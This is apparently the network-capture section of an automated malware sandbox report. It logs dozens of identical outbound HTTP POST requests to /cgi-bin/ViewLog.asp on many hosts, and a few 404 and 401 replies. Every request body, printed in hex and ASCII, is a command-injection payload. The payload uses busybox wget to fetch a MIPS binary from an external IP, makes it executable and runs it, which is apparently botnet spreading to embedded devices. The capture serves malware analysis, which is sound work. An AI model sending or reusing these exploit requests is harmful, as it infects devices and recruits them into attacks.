                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              680192.168.2.133857094.236.167.1658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:05.031333923 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              681192.168.2.133365462.94.44.1548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:05.033633947 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:05.321126938 CET398INHTTP/1.0 404 Not Found
                                              Date: Thu, 23 Nov 2023 05:32:00 GMT
                                              Server: Boa/0.94.13
                                              X-Frame-Options: Deny
                                              Connection: close
                                              Content-Type: text/html; charset=ISO-8859-1
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              682192.168.2.135118894.121.109.1328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:05.038276911 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              683192.168.2.134115294.122.92.1528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:05.191890955 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              684192.168.2.133368431.136.134.278080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:05.631283998 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.214211941 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:07.366189957 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.830177069 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.438174963 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              685192.168.2.133855094.236.167.1658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:05.814963102 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              686192.168.2.133527831.200.106.2068080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:05.828485012 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              687192.168.2.133477295.86.95.1658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:05.845829964 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              688192.168.2.134647494.120.215.1118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:06.474982977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              689192.168.2.135265231.136.79.188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:06.621438026 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:07.206188917 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:08.358181000 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.854201078 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:15.462160110 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              690192.168.2.134758431.136.247.598080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:06.997548103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:07.558219910 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:08.710170984 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.110198975 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:15.718172073 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              691192.168.2.136009495.163.16.928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:07.032563925 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:07.245387077 CET464INHTTP/1.1 401 Unauthorized
                                              Server: nginx/1.10.2
                                              Date: Thu, 23 Nov 2023 04:18:07 GMT
                                              Content-Type: text/html
                                              Content-Length: 195
                                              Connection: keep-alive
                                              WWW-Authenticate: Basic realm="closed area"
